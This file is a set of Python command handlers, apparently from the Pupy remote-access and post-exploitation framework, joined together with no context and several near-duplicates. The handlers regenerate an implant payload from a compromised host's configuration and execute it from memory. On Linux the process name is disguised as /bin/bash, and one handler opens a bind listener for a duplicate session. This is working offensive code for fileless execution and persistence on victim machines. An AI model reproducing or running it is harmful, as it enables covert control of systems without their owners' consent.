def run(self, args): self.success("looking for configured connect back address ...") payload, tpl, _ = pupygen.generate_binary_from_template( self.client.get_conf(), self.client.desc['platform'], arch=self.client.arch) self.success( "Generating the payload with the current config from {} - size={}". format(tpl, len(payload))) self.success("Executing the payload from memory ...") if self.client.is_windows(): exec_pe(self, "", raw_pe=payload, interactive=False, fork=True, timeout=None, use_impersonation=args.impersonate, suspended_process=args.process) elif self.client.is_linux(): mexec(self, payload, [], argv0='/bin/bash', stdout=False, raw=True, terminate=False) self.success("pupy payload executed from memory")
def run(self, args): #usefull for bind connection launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address'] newClientConf = self.client.get_conf() listeningAddressPort =None #For Bind mode if self.client.is_windows() and launcherType == "bind": listeningPort = -1 self.info('The current pupy launcher is using a BIND connection on the Windows target.') self.info('It is listening on {0} on the target'.format(addressPort)) self.info('For the duplication, you have to choose another port and it will ' 'listen on this new specific port on the target') self.info("Be careful, you have to choose a port which is not used on the target!") self.info("Be careful to firewall configuration/rules on the target too...") while listeningPort==-1: try: listeningPort = int(input("[?] Give me the listening port to use on the target: ")) except Exception as e: self.warning("You have to give me a valid port. Try again. ({})".format(e)) listeningAddress = addressPort.split(':')[0] listeningAddressPort = "{0}:{1}".format(listeningAddress, listeningPort) self.info("The new pupy instance will listen on {0} on the target".format(listeningAddressPort)) newClientConf = self.client.get_conf() #Modify the listening port on the conf. If it is not modified, #the payload will listen on the same port as the inital pupy launcher on the target newClientConf['launcher_args'][newClientConf['launcher_args'].index("--port")+1] = str(listeningPort) #Delete --oneliner-host argument, not compatible with exe payload for pos, val in enumerate(newClientConf['launcher_args']): if "--oneliner-host" in val: newClientConf['launcher_args'][pos]="" newClientConf['launcher_args'][pos+1]="" self.success("Generating the payload...") payload, tpl, _ = pupygen.generate_binary_from_template( self.log, newClientConf, self.client.desc['platform'], arch=self.client.arch ) self.success("Payload generated with the current config from {} - size={}".format(tpl, len(payload))) self.success("Executing the payload from memory ...") if self.client.is_windows(): exec_pe( self, "", raw_pe=payload, interactive=False, use_impersonation=args.impersonate, suspended_process=args.process, wait=False ) elif self.client.is_linux(): mexec(self, payload, [], argv0='/bin/bash', raw=True) self.success("pupy payload executed from memory") if self.client.is_windows() and launcherType == "bind": self.success( 'You have to connect to the target manually on {0}: ' 'try "connect --host {0}" in pupy shell'.format(listeningAddressPort))
def run(self, args): self.success("looking for configured connect back address ...") payload, tpl, _ = pupygen.generate_binary_from_template( self.client.get_conf(), self.client.desc['platform'], arch=self.client.arch ) self.success("Generating the payload with the current config from {} - size={}".format(tpl, len(payload))) self.success("Executing the payload from memory ...") if self.client.is_windows(): exec_pe( self, "", raw_pe=payload, interactive=False, fork=True, timeout=None, use_impersonation=args.impersonate, suspended_process=args.process ) elif self.client.is_linux(): mexec(self, payload, [], argv0='/bin/bash', stdout=False, raw=True, terminate=False) self.success("pupy payload executed from memory")
def run(self, args): if self.client.is_windows(): log = exec_pe( self, args.args, path=args.path, interactive=args.interactive, use_impersonation=args.impersonate, suspended_process=args.suspended_process ) elif self.client.is_linux(): log = mexec( self, args.path, args.args, argv0=args.argv0 or path.basename(args.path), interactive=args.interactive )
def run(self, args): if self.client.is_windows(): log = exec_pe( self, args.args, path=args.path, interactive=args.interactive, fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate, suspended_process=args.suspended_process ) elif self.client.is_linux(): log = mexec( self, args.path, args.args, argv0=args.argv0 or path.basename(args.path), interactive=args.interactive ) if log and args.log: with open(args.log, 'wb') as output: output.write(log)